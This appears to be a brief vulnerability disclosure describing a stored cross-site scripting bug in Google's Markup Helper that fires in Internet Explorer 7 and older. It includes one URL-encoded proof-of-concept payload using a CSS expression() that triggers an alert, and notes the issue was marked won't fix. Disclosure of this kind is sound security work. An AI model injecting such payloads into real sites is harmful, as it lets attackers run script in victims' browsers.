Bug Type: Stored XSS Vulnerability
Browser: Internet Explorer 7 or less
Vulnerable Module: Markup Helper : https://www.google.com/webmasters/markup-helper/
Status :Wont Fix .
The actual web application code is being hosted on .
[pastacode lang=”markup” manual=”https%3A%2F%2Fmarkuphelper.googleusercontent.com%2F%0A” message=”” highlight=”” provider=”manual”/]
[pastacode lang=”markup” manual=”%3Cdiv%20style%3D%22width%3A%20expression(alert(%2FXSS_Jasminder%2F))%3B%22%3E%3C%2Fdiv%3E%0A” message=”” highlight=”” provider=”manual”/]
Now lets open the iframe src url in Internet Explorer 7 . The stored XSS payload gets fired.